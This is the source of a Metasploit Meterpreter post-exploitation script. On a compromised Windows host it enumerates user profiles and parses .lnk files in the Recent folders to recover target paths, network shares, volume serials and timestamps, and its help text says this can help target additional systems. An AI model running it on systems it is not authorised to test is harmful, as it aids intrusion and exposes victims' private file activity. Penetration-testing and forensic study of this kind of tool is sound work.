metasploit-framework/scripts/meterpreter/dumplinks.rb

382 lines
11 KiB
Ruby

# $Id$
# Meterpreter script `for extracting information from Windows lnk files`
# Provided by davehull at dph_msf@trustedsignal.com
# Version 0.2
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Dump everything for each link file." ],
"-w" => [ false, "Redirect output to file."]
)
@everything, @output_dir, @data_out = nil
opts.parse(args) { |opt, idx, val|
case opt
when '-e'
@everything = true
when '-w'
@output_dir = ::File.join(Msf::Config.log_directory, 'dumplinks')
when "-h"
print_line "dumplinks -- parse .lnk files from user's Recent Documents"
print_line
print_line "dumplinks is a modified port of Harlan Carvey's lslnk.pl Perl script."
print_line "dumplinks parses .lnk files from a user's Recent documents folder and"
print_line "Microsoft Office's Recent documents folder, if present. Windows creates"
print_line "these link files automatically for many common file types."
print_line
print_line "\tResults are saved to #{::File.join(Msf::Config.log_directory, 'dumplinks')} if -w is used."
print_line
print_line "The .lnk files contain time stamps, file locations, including share"
print_line "names, volume serial #s and more. This info may help you target"
print_line "additional systems."
print_line
print_line "By default, dumplinks only returns the destination for the shortcut."
print_line "See the available arguments for other options."
print_line (opts.usage)
raise Rex::Script::Completed
end
}
# ----------------------------------------------------------------
# Set up the environment
@client = client
info = @client.sys.config.sysinfo
os = @client.sys.config.sysinfo['OS']
if @output_dir
# Create filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d")
# Create a directory for the output
@logs = ::File.join(@output_dir, info['Computer'] + filenameinfo)
# Create output directory
::FileUtils.mkdir_p(@logs)
end
# ---------------------------------------------------------------
# Function for enumerating users if running as SYSTEM
# Borrowed from get_pidgin_creds
def enum_users(os)
users = []
userinfo = {}
user = @client.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
if os =~ /7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
officelnkpath = "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\"
else
userpath = sysdrv + "\\Documents and Settings\\"
lnkpath = "\\Recent\\"
officelnkpath = "\\Application Data\\Microsoft\\Office\\Recent\\"
end
if user == "NT AUTHORITY\\SYSTEM"
print_status("Running as SYSTEM extracting user list...")
@client.fs.dir.foreach(userpath) do |u|
next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini)$/
userinfo['username'] = u
userinfo['userpath'] = userpath + u + lnkpath
userinfo['useroffcpath'] = userpath + u + officelnkpath
userinfo['userpath'] = dir_entry_exists(userinfo['userpath'])
userinfo['useroffcpath'] = dir_entry_exists(userinfo['useroffcpath'])
users << userinfo
end
else
uservar = @client.fs.file.expand_path("%USERNAME%")
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
userinfo['userpath'] = dir_entry_exists(userinfo['userpath'])
userinfo['useroffcpath'] = dir_entry_exists(userinfo['useroffcpath'])
users << userinfo
end
return users
end
# This is a hack because meterpreter doesn't support exists?(file)
def dir_entry_exists(path)
files = @client.fs.dir.entries(path)
rescue
return nil
else
return path
end
def extract_lnk_info(path)
@client.fs.dir.foreach(path) do |file_name|
if file_name =~ /\.lnk$/ # We have a .lnk file
record = nil
offset = 0 # ToDo: Look at moving this to smaller scope
lnk_file = @client.fs.file.new(path + file_name, "rb")
record = lnk_file.sysread(0x04)
if record.unpack('V')[0] == 76 # We have a .lnk file signature
file_stat = @client.fs.filestat.new(path + file_name)
print_status "Processing: #{path + file_name}."
@data_out = ""
record = lnk_file.sysread(0x48)
hdr = get_headers(record)
if @everything
@data_out += get_lnk_file_MAC(file_stat, path, file_name)
@data_out += "Contents of #{path + file_name}:\n"
@data_out += get_flags(hdr)
@data_out += get_attrs(hdr)
@data_out += get_lnk_MAC(hdr)
@data_out += get_showwnd(hdr)
@data_out += get_lnk_MAC(hdr)
end
if shell_item_id_list(hdr)
# advance the file & offset
offset += 0x4c
lnk_file.sysseek(offset, ::IO::SEEK_SET)
record = lnk_file.sysread(2)
offset += record.unpack('v')[0] + 2
end
# Get File Location Info
if (hdr["flags"] & 0x02) > 0
lnk_file.sysseek(offset, ::IO::SEEK_SET)
record = lnk_file.sysread(4)
tmp = record.unpack('V')[0]
if tmp > 0
lnk_file.sysseek(offset, ::IO::SEEK_SET)
record = lnk_file.sysread(0x1c)
loc = get_file_location(record)
if (loc['flags'] & 0x01) > 0
if @everything
@data_out += "\tShortcut file is on a local volume.\n"
end
lnk_file.sysseek(offset + loc['vol_ofs'], ::IO::SEEK_SET)
record = lnk_file.sysread(0x10)
lvt = get_local_vol_tbl(record)
lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10)
if @everything
@data_out += "\t\tVolume Name = #{lvt['name']}\n" +
"\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
"\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
end
end
if (loc['flags'] & 0x02) > 0
if @everything
@data_out += "\tFile is on a network share.\n"
end
lnk_file.sysseek(offset + loc['network_ofs'], ::IO::SEEK_SET)
record = lnk_file.sysread(0x14)
nvt = get_net_vol_tbl(record)
nvt['name'] = lnk_file.sysread(nvt['len'] - 0x14)
if @everything
@data_out += "\tNetwork Share name = #{nvt['name']}\n"
end
end
if loc['base_ofs'] > 0
@data_out += get_target_path(loc['base_ofs'] + offset, lnk_file)
elsif loc['path_ofs'] > 0
@data_out += get_target_path(loc['path_ofs'] + offset, lnk_file)
end
end
end
end
lnk_file.close
if @output_dir
@file_out_name = @logs + "/" + file_name + ".txt"
print_status "Writing: #{@file_out_name}"
filewrt(@file_out_name, @data_out)
else
print_status @data_out
end
end
end
end
# Not only is this code slow, it seems
# buggy. I'm studying the recently released
# MS Specs for a better way.
def get_target_path(path_ofs, lnk_file)
name = []
lnk_file.sysseek(path_ofs, ::IO::SEEK_SET)
record = lnk_file.sysread(2)
while (record.unpack('v')[0] != 0)
name.push(record)
record = lnk_file.sysread(2)
end
return "\tTarget path = #{name.join}\n"
end
def shell_item_id_list(hdr)
# Check for Shell Item ID List
if (hdr["flags"] & 0x01) > 0
return true
else
return nil
end
end
def get_lnk_file_MAC(file_stat, path, file_name)
data_out = "#{path + file_name}:\n"
data_out += "\tAccess Time = #{file_stat.atime}\n"
data_out += "\tCreation Date = #{file_stat.ctime}\n"
data_out += "\tModification Time = #{file_stat.mtime}\n"
return data_out
end
def get_vol_type(type)
vol_type = { 0 => "Unknown",
1 => "No root directory",
2 => "Removable",
3 => "Fixed",
4 => "Remote",
5 => "CD-ROM",
6 => "RAM Drive"}
return vol_type[type]
end
def get_showwnd(hdr)
showwnd = { 0 => "SW_HIDE",
1 => "SW_NORMAL",
2 => "SW_SHOWMINIMIZED",
3 => "SW_SHOWMAXIMIZED",
4 => "SW_SHOWNOACTIVE",
5 => "SW_SHOW",
6 => "SW_MINIMIZE",
7 => "SW_SHOWMINNOACTIVE",
8 => "SW_SHOWNA",
9 => "SW_RESTORE",
10 => "SHOWDEFAULT"}
data_out = "\tShowWnd value(s):\n"
showwnd.each do |key, value|
if (hdr["showwnd"] & key) > 0
data_out += "\t\t#{showwnd[key]}.\n"
end
end
return data_out
end
def get_lnk_MAC(hdr)
data_out = "\tTarget file's MAC Times stored in lnk file:\n"
data_out += "\t\tCreation Time = #{Time.at(hdr["ctime"])}. (UTC)\n"
data_out += "\t\tModification Time = #{Time.at(hdr["mtime"])}. (UTC)\n"
data_out += "\t\tAccess Time = #{Time.at(hdr["atime"])}. (UTC)\n"
return data_out
end
def get_attrs(hdr)
fileattr = {0x01 => "Target is read only",
0x02 => "Target is hidden",
0x04 => "Target is a system file",
0x08 => "Target is a volume label",
0x10 => "Target is a directory",
0x20 => "Target was modified since last backup",
0x40 => "Target is encrypted",
0x80 => "Target is normal",
0x100 => "Target is temporary",
0x200 => "Target is a sparse file",
0x400 => "Target has a reparse point",
0x800 => "Target is compressed",
0x1000 => "Target is offline"}
data_out = "\tAttributes:\n"
fileattr.each do |key, attr|
if (hdr["attr"] & key) > 0
data_out += "\t\t#{fileattr[key]}.\n"
end
end
return data_out
end
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
if data2wrt
data2wrt.each_line do |d|
output.puts(d)
end
end
output.close
end
def get_flags(hdr)
flags = {0x01 => "Shell Item ID List exists",
0x02 => "Shortcut points to a file or directory",
0x04 => "The shortcut has a descriptive string",
0x08 => "The shortcut has a relative path string",
0x10 => "The shortcut has working directory",
0x20 => "The shortcut has command line arguments",
0x40 => "The shortcut has a custom icon"}
data_out = "\tFlags:\n"
flags.each do |key, flag|
if (hdr["flags"] & key) > 0
data_out += "\t\t#{flags[key]}.\n"
end
end
return data_out
end
def get_headers(record)
hd = record.unpack('x16V12x8')
hdr = Hash.new()
hdr["flags"] = hd[0]
hdr["attr"] = hd[1]
hdr["ctime"] = get_time(hd[2], hd[3])
hdr["mtime"] = get_time(hd[4], hd[5])
hdr["atime"] = get_time(hd[6], hd[7])
hdr["length"] = hd[8]
hdr["icon_num"] = hd[9]
hdr["showwnd"] = hd[10]
hdr["hotkey"] = hd[11]
return hdr
end
def get_net_vol_tbl(file_net_rec)
nv = Hash.new()
(nv['len'], nv['ofs']) = file_net_rec.unpack("Vx4Vx8")
return nv
end
def get_local_vol_tbl(lvt_rec)
lv = Hash.new()
(lv['len'], lv['type'], lv['vol_sn'], lv['ofs']) = lvt_rec.unpack('V4')
return lv
end
def get_file_location(file_loc_rec)
location = Hash.new()
(location["len"], location["ptr"], location["flags"],
location["vol_ofs"], location["base_ofs"], location["network_ofs"],
location["path_ofs"]) = file_loc_rec.unpack('V7')
return location
end
def get_time(lo_byte, hi_byte)
if (lo_byte == 0 && hi_byte == 0)
return 0
else
lo_byte -= 0xd53e8000
hi_byte -= 0x019db1de
time = (hi_byte * 429.4967296 + lo_byte/1e7).to_i
if time < 0
return 0
end
end
return time
end
enum_users(os).each do |user|
if user['userpath']
print_status "Extracting lnk files for user #{user['username']} at #{user['userpath']}..."
extract_lnk_info(user['userpath'])
else
print_status "No Recent directory found for user #{user['username']}. Nothing to do."
end
if user['useroffcpath']
print_status "Extracting lnk files for user #{user['username']} at #{user['useroffcpath']}..."
extract_lnk_info(user['useroffcpath'])
else
print_status "No Recent Office files found for user #{user['username']}. Nothing to do."
end
end